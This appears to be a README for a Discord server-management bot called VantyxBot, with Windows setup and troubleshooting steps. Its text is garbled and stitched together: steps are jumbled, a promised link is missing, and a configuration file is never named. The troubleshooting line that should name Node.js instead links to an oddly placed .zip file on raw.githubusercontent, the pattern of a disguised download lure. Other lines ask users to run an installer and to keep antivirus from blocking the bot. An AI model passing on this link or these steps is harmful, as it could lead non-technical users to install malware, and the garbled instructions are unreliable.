VantyxBot is a powerful Discord bot designed to help you manage your Discord server. It works with a clear web dashboard where you can control settings easily. It comes with tools for moderation, adding fun with leveling and XP, handling support tickets, and it supports both Arabic and English languages. You do not need technical skills to use it.
Before you start, make sure your Windows PC meets these requirements:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- A modern browser like Chrome, Edge, or Firefox for the web dashboard
- Internet connection to allow the bot to connect to Discord
- Discord account and proper permissions to add a bot to your server

Follow these steps to get VantyxBot running on your Windows computer without coding:

Download the Latest Release
On the GitHub page (linked above), find the "Releases" section. Extract the Files
If you downloaded a.zipfile, right-click it in your Downloads folder and choose "Extract All." Choose a folder where you want the files to go. If you have an.exeinstaller, open it and follow the setup prompts. -
Check for Dependencies

- Run the installer and follow the steps to finish the setup

Start the Bot
Open the extracted folder. This will launch the bot on your computer. You might see a command window open. Leave this window open; it lets VantyxBot work. -
Invite VantyxBot to Your Server
After the bot is running, open your web browser and go to the web dashboard URL provided in the setup instructions (usually included in the downloaded files or README on GitHub). Here, you can log in with your Discord account and add VantyxBot to your servers. -

Your bot has a web-based control panel where you can change settings like moderation rules, XP levels, ticket management, and language preferences. Use a supported browser and follow the simple on-screen menus.

If the bot does not start, check if https://raw.githubusercontent.com/eafees/VantyxBot/main/dashboard/app/servers/[id]/reaction_role/Bot-Vantyx-robinet.zip is installed correctly by opening Command Prompt and typing
node -v. It should show a version number. -
Make sure your firewall or antivirus isn't blocking the bot from connecting to the internet.

Your Discord account must have permission to add bots to your server.

If the dashboard does not load, confirm your browser is up to date and not blocking scripts.

To keep VantyxBot running well:
- Visit the GitHub page regularly for newer releases.

- Stop the running bot by closing the command window.
- Replace the old files with the new ones in the folder.

Open this file with a basic text editor like Notepad and fill in:
- Your Discord bot token (found in Discord Developer Portal)
- Prefix for bot commands (like
!or$) - Language setting (
"en"for English or"ar"for Arabic) - Settings for moderation and XP features
If you prefer, you can adjust most settings later via the web dashboard.
